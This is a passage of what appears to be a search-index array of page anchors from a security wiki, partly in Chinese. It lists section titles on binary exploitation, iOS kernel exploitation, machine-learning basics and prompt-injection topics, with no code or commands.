ointer-mangling-on-fastbins-and-tcache","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#security-benefits-1","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#demangling-pointers-with-a-heap-leak","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#algorithm-overview","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#pointer-guard","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#bypassing-pointer-guard-with-a-leak","binary-exploitation/common-binary-protections-and-bypasses/libc-protections.html#references","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#内存标记扩展-mte","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#内存标记扩展的工作原理","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#mte-指针标签","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#mte-内存标签","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#检查模式","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#同步","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#异步","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#混合","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#实现与检测示例","binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.html#参考","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#no-exec--nx","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/no-exec-nx.html#绕过方法","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#pie","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#基本信息","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#绕过方法","binary-exploitation/common-binary-protections-and-bypasses/pie/index.html#参考","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#bf-地址在栈中","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#暴力破解地址","binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.html#改进","binary-exploitation/common-binary-protections-and-bypasses/relro.html#relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#relro-1","binary-exploitation/common-binary-protections-and-bypasses/relro.html#partial-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#full-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#如何检查二进制文件的-relro-状态","binary-exploitation/common-binary-protections-and-bypasses/relro.html#在编译自己的代码时启用-relro","binary-exploitation/common-binary-protections-and-bypasses/relro.html#绕过技术","binary-exploitation/common-binary-protections-and-bypasses/relro.html#现实世界的绕过示例-2024-ctf---pwncollege-enlightened-","binary-exploitation/common-binary-protections-and-bypasses/relro.html#最近的研究与漏洞-2022-2025","binary-exploitation/common-binary-protections-and-bypasses/relro.html#参考文献","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stack-canaries","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stackguard-和-stackshield","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#stack-smash-protector-propolice--fstack-protector","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#长度","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#绕过","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/index.html#参考文献","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#bf-forked--threaded-stack-canaries","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#brute-force-canary","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#example-1","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#示例-2","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#线程","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.html#其他示例与参考","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#打印栈金丝雀","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#扩大打印的栈","binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.html#任意读取","binary-exploitation/arbitrary-write-2-exec/index.html#arbitrary-write-2-exec","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#www2exec---sips-icc-profile-out-of-bounds-write-cve-2024-44236","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#概述","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#易受攻击的代码","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#利用步骤","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#快速-poc-生成器-python-3","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#yara-检测规则","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#影响","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#检测与缓解","binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.html#参考","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#www2exec---atexit-tls存储和其他混淆指针","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#__atexit-结构","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#link_map","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#tls-storage-dtor_list-在--__run_exit_handlers--中的覆盖","binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.html#__run_exit_handlers--中的其他损坏指针","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#www2exec---dtors--fini_array","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#dtors","binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.html#fini_array","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#www2exec---gotplt","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#基本信息","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#got-全局偏移表","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#plt-过程链接表","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#获取执行","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#检查-got","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#got2exec","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#libc-got-条目","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#free2system","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#strlen2system","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#one-gadget","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#从堆滥用-got","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#保护","binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.html#参考","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#www2exec---__malloc_hook--__free_hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#malloc-hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#free-hook","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#tcache-poisoning--safe-linking-glibc-232--233","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#glibc--234中发生了什么变化","binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.html#参考文献","binary-exploitation/common-exploiting-problems.html#常见的利用问题","binary-exploitation/common-exploiting-problems.html#远程利用中的fd","binary-exploitation/common-exploiting-problems.html#socat--pty","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#windows-exploiting-basic-guide---oscp-lvl","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#开始安装-slmail-服务","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#重启-slmail-服务","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#非常基础的-python-利用模板","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#更改-immunity-debugger-字体","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#将进程附加到-immunity-debugger","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#发送漏洞利用并检查-eip-是否受到影响","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#创建一个模式以修改-eip","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#检查堆栈中的-shellcode-空间","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#检查坏字符","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#找到-jmp-esp-作为返回地址","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#创建-shellcode","binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.html#改进-shellcode","binary-exploitation/ios-exploiting/index.html#ios-exploiting","binary-exploitation/ios-exploiting/index.html#ios-exploit-mitigations","binary-exploitation/ios-exploiting/index.html#old-kernel-heap-pre-ios-15--pre-a12-era","binary-exploitation/ios-exploiting/index.html#the-freelist","binary-exploitation/ios-exploiting/index.html#利用-freelist","binary-exploitation/ios-exploiting/index.html#heap-grooming--feng-shui","binary-exploitation/ios-exploiting/index.html#modern-kernel-heap-ios-15a12-socs","binary-exploitation/ios-exploiting/index.html#1-from-classic-kalloc-to-kalloc_type","binary-exploitation/ios-exploiting/index.html#2-slabs-and-per-cpu-caches","binary-exploitation/ios-exploiting/index.html#3-randomization-inside-zones","binary-exploitation/ios-exploiting/index.html#4-guarded-allocations","binary-exploitation/ios-exploiting/index.html#5-page-protection-layer-ppl-and-sptm","binary-exploitation/ios-exploiting/index.html#6-large-allocations","binary-exploitation/ios-exploiting/index.html#7-allocation-patterns-attackers-target","binary-exploitation/ios-exploiting/index.html#example-allocation-flow-in-modern-heap","binary-exploitation/ios-exploiting/index.html#comparison-table","binary-exploitation/ios-exploiting/index.html#old-physical-use-after-free-via-iosurface","binary-exploitation/ios-exploiting/index.html#ghidra-install-bindiff","binary-exploitation/ios-exploiting/index.html#using-bindiff-with-kernel-versions","binary-exploitation/ios-exploiting/index.html#finding-the-right-xnu-version","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#cve-2021-30807-iomobileframebuffer-oob","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#漏洞","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#基本-poc","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#leak-内核地址-poc","binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.html#参考资料","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#cve-2021-30807-iomobileframebuffer-oob","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#漏洞","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#dos-poc","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#arbitrary-read-poc-explained","binary-exploitation/ios-exploiting/CVE-2021-30807-IOMobileFrameBuffer.html#参考资料","binary-exploitation/ios-exploiting/ios-corellium.html#ios-如何连接到-corellium","binary-exploitation/ios-exploiting/ios-corellium.html#prereqs","binary-exploitation/ios-exploiting/ios-corellium.html#connect-to-the-iphone-vm-from-localhost","binary-exploitation/ios-exploiting/ios-corellium.html#a--quick-connect无需-vpn","binary-exploitation/ios-exploiting/ios-corellium.html#b--vpn--直接-ssh","binary-exploitation/ios-exploiting/ios-corellium.html#上传并执行原生二进制","binary-exploitation/ios-exploiting/ios-corellium.html#21--上传","binary-exploitation/ios-exploiting/ios-corellium.html#上传并安装-ios-应用-ipa","binary-exploitation/ios-exploiting/ios-corellium.html#路径-a---web-ui-fastest","binary-exploitation/ios-exploiting/ios-corellium.html#路径-b---通过-corellium-agent-脚本化","binary-exploitation/ios-exploiting/ios-corellium.html#路径-c---non-jailbroken-proper-signing--sideloadly","binary-exploitation/ios-exploiting/ios-corellium.html#extras","binary-exploitation/ios-exploiting/ios-corellium.html#常见陷阱","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#ios-如何连接到-corellium","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#漏洞代码","binary-exploitation/ios-exploiting/ios-example-heap-exploit.html#exploit","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#ios-physical-use-after-free-via-iosurface","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#physical-use-after-free","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#memory-management-in-xnu","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#physical-use-after-free-1","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#iosurface-heap-spray","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#step-by-step-heap-spray-process","binary-exploitation/ios-exploiting/ios-physical-uaf-iosurface.html#使用-iosurface-实现-kernel-readwrite","AI/index.html#ai在网络安全中的应用","AI/index.html#主要机器学习算法","AI/index.html#llm架构","AI/index.html#ai安全","AI/index.html#ai风险框架","AI/index.html#ai提示安全","AI/index.html#ai模型rce","AI/index.html#ai模型上下文协议","AI/index.html#ai辅助模糊测试与自动化漏洞发现","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#ai-assisted-fuzzing--automated-vulnerability-discovery","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#概述","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#1-llm生成的种子输入","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#提示","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#2-语法演化模糊测试","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#3-基于代理的-pov漏洞证明生成","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#4-使用微调代码模型的定向模糊测试","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#5-ai引导的修补策略","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#51-超级补丁","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#52-推测补丁比率","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#整合所有内容","AI/AI-Assisted-Fuzzing-and-Vulnerability-Discovery.html#参考文献","AI/AI-Deep-Learning.html#深度学习","AI/AI-Deep-Learning.html#深度学习-1","AI/AI-Deep-Learning.html#神经网络","AI/AI-Deep-Learning.html#激活函数","AI/AI-Deep-Learning.html#反向传播","AI/AI-Deep-Learning.html#卷积神经网络cnns","AI/AI-Deep-Learning.html#定义cnn的示例","AI/AI-Deep-Learning.html#cnn-代码示例","AI/AI-Deep-Learning.html#cnn-代码训练示例","AI/AI-Deep-Learning.html#循环神经网络-rnns","AI/AI-Deep-Learning.html#长短期记忆-lstm-和门控循环单元-gru","AI/AI-Deep-Learning.html#llms-大型语言模型","AI/AI-Deep-Learning.html#变换器架构","AI/AI-Deep-Learning.html#扩散模型","AI/AI-MCP-Servers.html#mcp-服务器","AI/AI-MCP-Servers.html#什么是-mpc---模型上下文协议","AI/AI-MCP-Servers.html#基本-mcp-服务器","AI/AI-MCP-Servers.html#mcp-漏洞","AI/AI-MCP-Servers.html#通过直接-mcp-数据进行的-prompt-injection--跳行攻击--工具中毒","AI/AI-MCP-Servers.html#通过间接数据进行提示注入","AI/AI-MCP-Servers.html#通过mcp信任绕过进行持久代码执行cursor-ide--mcpoison","AI/AI-MCP-Servers.html#参考","AI/AI-Model-Data-Preparation-and-Evaluation.html#模型数据准备与评估","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据收集","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据清理","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据清理示例","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据转换","AI/AI-Model-Data-Preparation-and-Evaluation.html#数据拆分","AI/AI-Model-Data-Preparation-and-Evaluation.html#模型评估","AI/AI-Model-Data-Preparation-and-Evaluation.html#准确率","AI/AI-Model-Data-Preparation-and-Evaluation.html#precision","AI/AI-Model-Data-Preparation-and-Evaluation.html#召回率敏感性","AI/AI-Model-Data-Preparation-and-Evaluation.html#f1-score","AI/AI-Model-Data-Preparation-and-Evaluation.html#roc-auc-接收者操作特征---曲线下面积","AI/AI-Model-Data-Preparation-and-Evaluation.html#特异性","AI/AI-Model-Data-Preparation-and-Evaluation.html#matthews-correlation-coefficient-mcc","AI/AI-Model-Data-Preparation-and-Evaluation.html#平均绝对误差-mae","AI/AI-Model-Data-Preparation-and-Evaluation.html#混淆矩阵","AI/AI-Models-RCE.html#models-rce","AI/AI-Models-RCE.html#加载模型到-rce","AI/AI-Models-RCE.html#--通过-torchload-调用-invokeai-rce-cve-2024-12029","AI/AI-Models-RCE.html#示例--创建恶意-pytorch-模型","AI/AI-Models-RCE.html#models-to-path-traversal","AI/AI-Models-RCE.html#深入探讨keras-keras-反序列化和小工具搜索","AI/AI-Models-RCE.html#参考文献","AI/AI-Prompts.html#ai-提示","AI/AI-Prompts.html#基本信息","AI/AI-Prompts.html#prompt-engineering","AI/AI-Prompts.html#prompt-attacks","AI/AI-Prompts.html#prompt-injection","AI/AI-Prompts.html#prompt-leaking","AI/AI-Prompts.html#jailbreak","AI/AI-Prompts.html#prompt-injection-via-direct-requests","AI/AI-Prompts.html#changing-the-rules--assertion-of-authority","AI/AI-Prompts.html#prompt-injection-via-context-manipulation","AI/AI-Prompts.html#storytelling--context-switching","AI/AI-Prompts.html#双重人格--role-play--dan--opposite-mode","AI/AI-Prompts.html#prompt-injection-via-text-alterations","AI/AI-Prompts.html#translation-trick","AI/AI-Prompts.html#拼写检查--语法更正作为利用方式","AI/AI-Prompts.html#summary--repetition-attacks","AI/AI-Prompts.html#编码与混淆格式","AI/AI-Prompts.html#indirect-exfiltration--prompt-leaking","AI/AI-Prompts.html#通过同义词或拼写错误进行混淆绕过过滤","AI/AI-Prompts.html#payload-splitting-step-by-step-injection","AI/AI-Prompts.html#third-party-or-indirect-prompt-injection","AI/AI-Prompts.html#ide-code-assistants-context-attachment-indirect-injection-backdoor-generation","AI/AI-Prompts.html#code-injection-via-prompt","AI/AI-Prompts.html#tools","AI/AI-Prompts.html#prompt-waf-bypass","AI/AI-Prompts.html#using-prompt-injection-techniques","AI/AI-Prompts.html#token-confusion","AI/AI-Prompts.html#autocompleteeditor-prefix-seeding-moderation-bypass-in-ides","AI/AI-Prompts.html#direct-base-model-invocation-outside-guardrails","AI/AI-Prompts.html#prompt-injection-in-github-copilot-hidden-mark-up","AI/AI-Prompts.html#1-hiding-the-payload-with-the--tag","AI/AI-Prompts.html#2-re-creating-a-believable-chat-turn","AI/AI-Prompts.html#3-leveraging-copilots-tool-firewall","AI/AI-Prompts.html#3-利用-copilot-的工具防火墙","AI/AI-Prompts.html#4-minimal-diff-backdoor-for-code-review-stealth","AI/AI-Prompts.html#4-minimal-diff-backdoor-用于代码审查隐蔽","AI/AI-Prompts.html#5-full-attack-flow","AI/AI-Prompts.html#5-完整攻击流程","AI/AI-Prompts.html#detection--mitigation-ideas","AI/AI-Prompts.html#检测与缓解思路","AI/AI-Prompts.html#prompt-injection-in-github-copilot--yolo-mode-autoapprove","AI/AI-Prompts.html#端到端利用链","AI/AI-Prompts.html#one-liner-poc","AI/AI-Prompts.html#隐蔽技巧","AI/AI-Prompts.html#缓解措施","AI/AI-Prompts.html#参考资料","AI/AI-Risk-Frameworks.html#ai-风险","AI/AI-Risk-Frameworks.html#owasp-机器学习十大漏洞","AI/AI-Risk-Frameworks.html#google-saif-风险","AI/AI-Risk-Frameworks.html#mitre-ai-atlas-matrix","AI/AI-Risk-Frameworks.html#llmjacking-token-theft--resale-of-cloud-hosted-llm-access","AI/AI-Risk-Frameworks.html#references","AI/AI-Supervised-Learning-Algorithms.html#监督学习算法","AI/AI-Supervised-Learning-Algorithms.html#基本信息","AI/AI-Supervised-Learning-Algorithms.html#算法","AI/AI-Supervised-Learning-Algorithms.html#线性回归","AI/AI-Supervised-Learning-Algorithms.html#逻辑回归","AI/AI-Supervised-Learning-Algorithms.html#决策树","AI/AI-Supervised-Learning-Algorithms.html#随机森林","AI/AI-Supervised-Learning-Algorithms.html#支持向量机svm","AI/AI-Supervised-Learning-Algorithms.html#朴素贝叶斯","AI/AI-Supervised-Learning-Algorithms.html#k-最近邻-k-nn","AI/AI-Supervised-Learning-Algorithms.html#梯度提升机例如xgboost","AI/AI-Supervised-Learning-Algorithms.html#组合模型集成学习和堆叠","AI/AI-Supervised-Learning-Algorithms.html#参考文献","AI/AI-Unsupervised-Learning-Algorithms.html#无监督学习算法","AI/AI-Unsupervised-Learning-Algorithms.html#无监督学习","AI/AI-Unsupervised-Learning-Algorithms.html#k均值聚类","AI/AI-Unsupervised-Learning-Algorithms.html#层次聚类","AI/AI-Unsupervised-Learning-Algorithms.html#dbscan基于密度的噪声应用空间聚类","AI/AI-Unsupervised-Learning-Algorithms.html#主成分分析-pca","AI/AI-Unsupervised-Learning-Algorithms.html#高斯混合模型-gmm","AI/AI-Unsupervised-Learning-Algorithms.html#隔离森林","AI/AI-Unsupervised-Learning-Algorithms.html#t-sne-t-分布随机邻居嵌入","AI/AI-Unsupervised-Learning-Algorithms.html#hdbscan带噪声的层次密度聚类应用","AI/AI-Unsupervised-Learning-Algorithms.html#鲁棒性和安全性考虑--中毒与对抗攻击-2023-2025","AI/AI-Unsupervised-Learning-Algorithms.html#现代开源工具-2024-2025","AI/AI-Unsupervised-Learning-Algorithms.html#参考文献","AI/AI-Reinforcement-Learning-Algorithms.html#强化学习算法","AI/AI-Reinforcement-Learning-Algorithms.html#强化学习","AI/AI-Reinforcement-Learning-Algorithms.html#q-learning","AI/AI-Reinforcement-Learning-Algorithms.html#sarsa状态-动作-奖励-状态-动作","AI/AI-Reinforcement-Learning-Algorithms.html#on-policy-vs-off-policy-learning","AI/AI-llm-architecture/index.html#llm-训练---数据准备","AI/AI-llm-architecture/index.html#基本信息","AI/AI-llm-architecture/index.html#1-分词","AI/AI-llm-architecture/index.html#2-数据采样","AI/AI-llm-architecture/index.html#3-标记嵌入","AI/AI-llm-architecture/index.html#4-注意机制","AI/AI-llm-architecture/index.html#5-llm-架构","AI/AI-llm-architecture/index.html#6-预训练与加载模型","AI/AI-llm-architecture/index.html#70-lora-在微调中的改进","AI/AI-llm-architecture/index.html#71-分类的微调","AI/AI-llm-architecture/index.html#72-按照指令进行微调","AI/AI-llm-architecture/0.-basic-llm-concepts.html#0-基本-llm-概念","AI/AI-llm-architecture/0.-basic-llm-concepts.html#预训练","AI/AI-llm-architecture/0.-basic-llm-concepts.html#主要-llm-组件","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensors-in-pytorch","AI/AI-llm-architecture/0.-basic-llm-concepts.html#mathematical-concept-of-tensors","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensors-as-data-containers","AI/AI-llm-architecture/0.-basic-llm-concepts.html#pytorch-tensors-vs-numpy-arrays","AI/AI-llm-architecture/0.-basic-llm-concepts.html#creating-tensors-in-pytorch","AI/AI-llm-architecture/0.-basic-llm-concepts.html#tensor-数据类型","AI/AI-llm-architecture/0.-basic-llm-concepts.html#常见的张量操作","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在深度学习中的重要性","AI/AI-llm-architecture/0.-basic-llm-concepts.html#自动微分","AI/AI-llm-architecture/0.-basic-llm-concepts.html#自动微分的数学解释","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在-pytorch-中实现自动微分","AI/AI-llm-architecture/0.-basic-llm-concepts.html#在更大神经网络中的反向传播","AI/AI-llm-architecture/0.-basic-llm-concepts.html#1-扩展到多层网络","AI/AI-llm-architecture/0.-basic-llm-concepts.html#2-反向传播算法","AI/AI-llm-architecture/0.-basic-llm-concepts.html#3-数学表示","AI/AI-llm-architecture/0.-basic-llm-concepts.html#4-pytorch-实现","AI/AI-llm-architecture/0.-basic-llm-concepts.html#5-理解反向传播","AI/AI-llm-architecture/0.-basic-llm-concepts.html#6-自动微分的优点","AI/AI-llm-architecture/1.-tokenizing.html#1-tokenizing","AI/AI-llm-architecture/1.-tokenizing.html#tokenizing","AI/AI-llm-architecture/1.-tokenizing.html#how-tokenizing-works","AI/AI-llm-architecture/1.-tokenizing.html#advanced-tokenizing-methods","AI/AI-llm-architecture/1.-tokenizing.html#code-example","AI/AI-llm-architecture/1.-tokenizing.html#参考","AI/AI-llm-architecture/2.-data-sampling.html#2-数据采样","AI/AI-llm-architecture/2.-data-sampling.html#数据采样","AI/AI-llm-architecture/2.-data-sampling.html#为什么数据采样很重要","AI/AI-llm-architecture/2.-data-sampling.html#数据采样中的关键概念","AI/AI-llm-architecture/2.-data-sampling.html#逐步示例","AI/AI-llm-architecture/2.-data-sampling.html#代码示例","AI/AI-llm-architecture/2.-data-sampling.html#高级采样策略-2023-2025","AI/AI-llm-architecture/2.-data-sampling.html#1-基于温度的混合加权","AI/AI-llm-architecture/3.-token-embeddings.html#3-token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#what-are-token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#initializing-token-embeddings","AI/AI-llm-architecture/3.-token-embeddings.html#标记嵌入在训练中的工作原理","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入为令牌嵌入添加上下文","AI/AI-llm-architecture/3.-token-embeddings.html#为什么需要位置嵌入","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入的类型","AI/AI-llm-architecture/3.-token-embeddings.html#位置嵌入是如何集成的","AI/AI-llm-architecture/3.-token-embeddings.html#代码示例","AI/AI-llm-architecture/3.-token-embeddings.html#参考文献","AI/AI-llm-architecture/4.-attention-mechanisms.html#4-注意机制","AI/AI-llm-architecture/4.-attention-mechanisms.html#神经网络中的注意机制和自注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#理解注意机制","AI/AI-llm-architecture/4.-attention-mechanisms.html#自注意力介绍","AI/AI-llm-architecture/4.-attention-mechanisms.html#计算注意权重逐步示例","AI/AI-llm-architecture/4.-attention-mechanisms.html#过程总结","AI/AI-llm-architecture/4.-attention-mechanisms.html#带可训练权重的自注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例","AI/AI-llm-architecture/4.-attention-mechanisms.html#因果注意力隐藏未来词汇","AI/AI-llm-architecture/4.-attention-mechanisms.html#应用因果注意力掩码","AI/AI-llm-architecture/4.-attention-mechanisms.html#使用-dropout-掩蔽额外的注意力权重","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例-1","AI/AI-llm-architecture/4.-attention-mechanisms.html#扩展单头注意力到多头注意力","AI/AI-llm-architecture/4.-attention-mechanisms.html#代码示例-2","AI/AI-llm-architecture/4.-attention-mechanisms.html#references","AI/AI-llm-architecture/5.-llm-architecture.html#5-llm-architecture","AI/AI-llm-architecture/5.-llm-architecture.html#llm-architecture","AI/AI-llm-architecture/5.-llm-architecture.html#代码表示","AI/AI-llm-architecture/5.-llm-architecture.html#gelu-激活函数","AI/AI-llm-architecture/5.-llm-architecture.html#前馈神经网络","AI/AI-llm-architecture/5.-llm-architecture.html#多头注意力机制","AI/AI-llm-architecture/5.-llm-architecture.html#层--归一化","AI/AI-llm-architecture/5.-llm-architecture.html#transformer-块","AI/AI-llm-architecture/5.-llm-architecture.html#gptmodel","AI/AI-llm-architecture/5.-llm-architecture.html#训练的参数数量","AI/AI-llm-architecture/5.-llm-architecture.html#逐步计算","AI/AI-llm-architecture/5.-llm-architecture.html#生成文本","AI/AI-llm-architecture/5.-llm-architecture.html#参考","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#6-预训练与加载模型","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本生成","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本评估","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#预训练示例","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#文本--ids-转换的函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#生成文本函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#loss-functions","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#加载数据","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#sanity-checks","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#选择用于训练和预计算的设备","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#训练函数","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#start-training","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#打印训练演变","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#保存模型","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#加载-gpt2-权重","AI/AI-llm-architecture/6.-pre-training-and-loading-models.html#参考文献","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#70-lora-在微调中的改进","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#lora-改进","AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.html#参考","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#71-fine-tuning-for-classification","AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.html#什么是","AI/AI-